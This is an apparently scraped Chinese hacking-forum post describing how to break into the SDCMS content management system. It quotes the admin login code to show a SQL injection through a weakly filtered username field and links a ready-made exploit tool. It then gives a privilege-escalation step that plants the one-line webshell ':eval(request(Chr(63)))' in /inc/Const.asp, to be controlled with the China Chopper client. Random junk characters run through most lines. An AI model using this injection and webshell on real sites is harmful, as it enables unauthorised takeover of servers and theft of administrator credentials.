作者:T00LS 鬼哥$ Q2 `7 W( Y/ [/ C: Y5 P
漏洞文件:后台目录/index.asp4 O6 {$ Z4 f* P: [4 p) X' W7 @
/ l k7 P6 X: @, o/ p
Sub Check
8 ^/ M# c" i1 L2 Y# P- d( w Dim username,password,code,getcode,Rs% r2 J6 s. t1 t
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub0 q0 F" W" d: i& i2 |5 U
username=FilterText(Trim(Request.Form("username")),1)( I" L& ^2 q; s. s
password=FilterText(Trim(Request.Form("password")),1)0 R. u+ n; z+ O& C4 H( ^% t0 O
code=Trim(Request.Form("yzm"))
7 s9 o" O9 J+ J' A' n getcode=Session("SDCMSCode")
; D& b8 p7 k5 h# e' m! l IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died3 c" F! q# q4 b v+ [; }
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied7 }6 S( v: d; \) R( G& i. X
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied
( ~* m6 X: A8 a IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied1 q0 {3 t1 {' j# z: S! {5 D
IF username="" or password="" Then" P' G7 D S, o3 u: u
Echo "用户名或密码不能为空" ied1 p, T4 L4 c, D$ F3 ~) U
Else
$ r7 |/ }9 _$ F# J- Y h Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
2 i/ m* E: f7 r9 B- }/ W$ l IF Rs.Eof Then
, R Z4 ?; c' r7 }. ^4 T AddLog username,GetIp,"登录失败",1
2 H) f$ u- X) z+ O# Q Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"! { k; F4 A: }0 ?! x
Else! H7 m4 V; M3 Q4 ]) H V& _7 n2 D
Add_Cookies "sdcms_id",Rs(0)
8 Z5 ?' q3 m @* N: F Add_Cookies "sdcms_name",username
* I9 X5 j, y& X- }4 Z# i% P Add_Cookies "sdcms_pwd",Rs(2)9 v7 k( q4 \4 {
Add_Cookies "sdcms_admin",Rs(3), S m6 ]# S# ]/ p# d
Add_Cookies "sdcms_alllever",Rs(4)
; B6 M2 g9 s& H Add_Cookies "sdcms_infolever",Rs(5)
8 [" F% T( z5 R. j( y4 \ Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
- k( c1 r( T+ h/ G; j5 ^3 k O AddLog username,GetIp,"登录成功",1& R( V6 }+ M: U4 }, Z- d* k
'自动删除30天前的Log记录( |8 J5 ~, q. |, b) x) N
IF Sdcms_DataType Then
5 E" ~$ @& [% K* P0 ^" u0 b Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
+ k. H) h* c; w) a, Q Else
" t p: z: ]# U+ X Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")3 a' K5 ^1 v6 M- K( E9 Y8 ~, A
End IF
) t& A0 V% k0 {" C7 u Go("sdcms_index.asp")7 k9 a0 G F3 a& r4 {
End IF. J) r. ~: I5 `9 l) d6 i
Rs.Close
6 Z1 j( J) F! @ u& o& \3 u Set Rs=Nothing) S+ G, w5 [% b" P
End IF
6 h0 j( z7 X. j; q5 tEnd Sub
: E6 u( H$ `% S" T o9 H3 n3 e5 T5 ` D8 Q, }+ H F) ?% p1 A
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码( o Y1 E! B+ F+ U
5 z$ {4 [4 L0 t% j) i1 u
Function FilterText(ByVal t0,ByVal t1)9 J3 t R1 @7 a- j4 C6 ^1 u& _1 ~
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function2 q2 [8 Y5 b2 l* l5 N1 B1 q
t0=Trim(t0)
/ U# P+ k' X: a- Y$ z0 A Select Case t1
% P6 _1 e5 ~2 d! z3 |: Z Case "1"5 H; V% { o4 R9 @" w
t0=Replace(t0,Chr(32),"")+ Z7 L1 ~; h" v8 l5 Q- B
t0=Replace(t0,Chr(13),""); p/ Q( s3 \0 H! a, e
t0=Replace(t0,Chr(10)&Chr(10),"")* b/ {; x, k- b0 |+ G5 s5 r3 Z
t0=Replace(t0,Chr(10),""); O+ b7 P; I: ?0 g) c! ]0 l
Case "2"6 {2 L1 S* U; }4 X3 d1 k9 e
t0=Replace(t0,Chr(8),"")'回格) \5 ^! }& b" [8 t+ ~! C; f
t0=Replace(t0,Chr(9),"")'tab(水平制表符)$ f5 D/ {& n- p/ ?3 c$ A" ~- ]/ T
t0=Replace(t0,Chr(10),"")'换行
7 z% I3 C6 J' v t0=Replace(t0,Chr(11),"")'tab(垂直制表符)2 i/ b; l0 W# F U. o
t0=Replace(t0,Chr(12),"")'换页% M/ I, L7 J: {% q0 f7 e* Z
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
* Z, n7 K b1 H' Q' e. k9 m( ~ t0=Replace(t0,Chr(22),"")
3 |1 I; @5 ~5 ^ W t0=Replace(t0,Chr(32),"")'空格 SPACE
* P1 ^8 K# M9 c) X t0=Replace(t0,Chr(33),"")'!' f9 \7 C5 I5 O/ e7 G
t0=Replace(t0,Chr(34),"")'"
! Q) o5 b5 l) g9 B6 J Q- R0 Q t0=Replace(t0,Chr(35),"")'#, Y& n3 F/ c4 r+ W% o W( B
t0=Replace(t0,Chr(36),"")'$
$ Z6 V$ c9 j" \! X! o( ` t0=Replace(t0,Chr(37),"")'%
8 [, V4 J( \2 Z c$ [- r t0=Replace(t0,Chr(38),"")'&( r8 _3 D6 Q$ q+ m
t0=Replace(t0,Chr(39),"")''% [" q- _* a& c9 H B: ~* V
t0=Replace(t0,Chr(40),"")'(4 [4 Q' E" n s, i! i. l a3 n
t0=Replace(t0,Chr(41),"")')
0 {) D* O" \1 e7 l$ h) R, ~ t0=Replace(t0,Chr(42),"")'*: ^; h# \" f- j/ {( g K
t0=Replace(t0,Chr(43),"")'+
+ D5 H+ I$ Q/ @9 Y t0=Replace(t0,Chr(44),"")',2 }7 n( M+ A6 ?4 T1 M9 T" H3 B0 T
t0=Replace(t0,Chr(45),"")'-. ^; h4 X" L# X
t0=Replace(t0,Chr(46),"")'.( t) a2 R, _) |) O" H7 G1 A( Y& M
t0=Replace(t0,Chr(47),"")'/2 E: C* R' W" d- L
t0=Replace(t0,Chr(58),"")':/ m5 Y% v5 j7 C
t0=Replace(t0,Chr(59),"")';
7 Q. p, b& O2 v& G: z7 ] t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
" B& x$ }- X2 u5 n t0=Replace(t0,Chr(63),"")'?
4 r9 }. \/ u$ l! w) x) `$ u* v t0=Replace(t0,Chr(64),"")'@
8 I$ j( ~ d: N5 u t3 D6 S, v4 a t0=Replace(t0,Chr(91),"")'\: s7 Z ]8 E$ {5 q+ H
t0=Replace(t0,Chr(92),"")'\( X5 | g% J+ ~/ t
t0=Replace(t0,Chr(93),"")']5 i* E A) v8 H; @ j' @
t0=Replace(t0,Chr(94),"")'^
. m6 } X9 [1 a+ A4 |2 @9 Z# H t0=Replace(t0,Chr(95),"")'_2 G$ l8 {9 q9 A, W, P
t0=Replace(t0,Chr(96),"")'`
4 D, _: h. H; ]* e% c' ? t0=Replace(t0,Chr(123),"")'{
/ r& n9 G* l: C' m5 k" }) [ t0=Replace(t0,Chr(124),"")'|, x6 l3 z+ U7 A" }7 j+ r, v m
t0=Replace(t0,Chr(125),"")'}( _" {( Y* k4 M
t0=Replace(t0,Chr(126),"")'~
' b% m$ t4 T# A5 ~+ a0 g Case Else
% P7 V8 f" |0 q& k8 s t0=Replace(t0, "&", "&")
( n9 v* m- o) j {: s: `. E t0=Replace(t0, "'", "'") Q6 o' p/ b" e3 q# u
t0=Replace(t0, """", """)! ?' T* W7 }: \' ? e
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")2 P3 u* R( K& U) z" c" l4 J p
End Select
: B5 ?- n( J2 r' O1 a+ C' a IF Instr(Lcase(t0),"expression")>0 Then% D5 W6 Q" w/ L* P8 ^8 v. k% |! q8 t6 `
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)3 \2 A$ |5 ^& |
End If
' a1 I6 Y. D: X4 j) X FilterText=t0: v2 n& O& R& p. h6 d; k! E0 G
End Function9 t7 h; l$ G$ R0 A& u% s' D
, J S2 q* u4 V, a1 F+ y
看到没。直接参数是1 只过滤
$ Y9 ~3 O1 P1 o t0=Replace(t0,Chr(32)," ")
) ]7 t) P5 ?2 H0 F6 r t0=Replace(t0,Chr(13),"")
8 e0 z: h" C3 h- r t0=Replace(t0,Chr(10)&Chr(10),"% U+ z, j5 z+ `9 l. m. Y. U* q# L
"); U& G; C h8 E% |5 Y
t0=Replace(t0,Chr(10),", ?7 q8 B" u9 K) K0 t- m
")
) W* m+ C' ]$ G& R漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
% T0 }: D; d% N6 s, `EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
. v* @, F9 n9 Y
* e" D/ \4 o/ C8 q4 {' d& g5 a测试:. R- ?* Z9 {; P4 s; E1 d
* V# `( p# H" J' j* a" p. a0 P9 H1 t6 ?3 _5 P, M
现在输入工具上验证码,然后点OK
& g, ~1 v& A: ]& {; q
$ E4 A& f& j- z
, v0 P% N7 y4 C' X3 F5 o* i看到我们直接进入后台管理界面了,呵呵!0 @* G8 n. m9 @1 s* w0 q) n' C
0 s1 J: \3 K5 }7 U: o
) u8 W: K% A7 ]
, m7 Z3 `' D$ p% s6 X# t0 }* b0 k这样直接进入后台了。。。。
( p" O! p1 W' W# X7 _" g) M7 Y
. h- o; [7 O% R0 U' @ 4 f9 x2 q$ N( @" C+ Z
. S" ? \1 ^% g% G' m0 \; |& v0 TSDCMS提权:
$ A9 P# t1 A/ U; m* b# K6 ` K6 N1 b% \
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
& n0 ~ s6 N( w" F J* Z4 \7 m6 Z& w% _. T) A0 }; S
) O( {9 ~0 D* ?7 I9 ~. Y' E; f X$ K, W5 x i: R
OK,现在用菜刀连接下!
8 J8 b3 F3 {9 `& v. w* M! l( R9 a- N+ \
6 j' t) F" v2 t% M; U9 J7 D5 [
# A& ]6 c+ y% W& |
9 N! x }+ g( S+ `1 r. j: `) o- J
5 G Y) F$ @8 v: E2 f |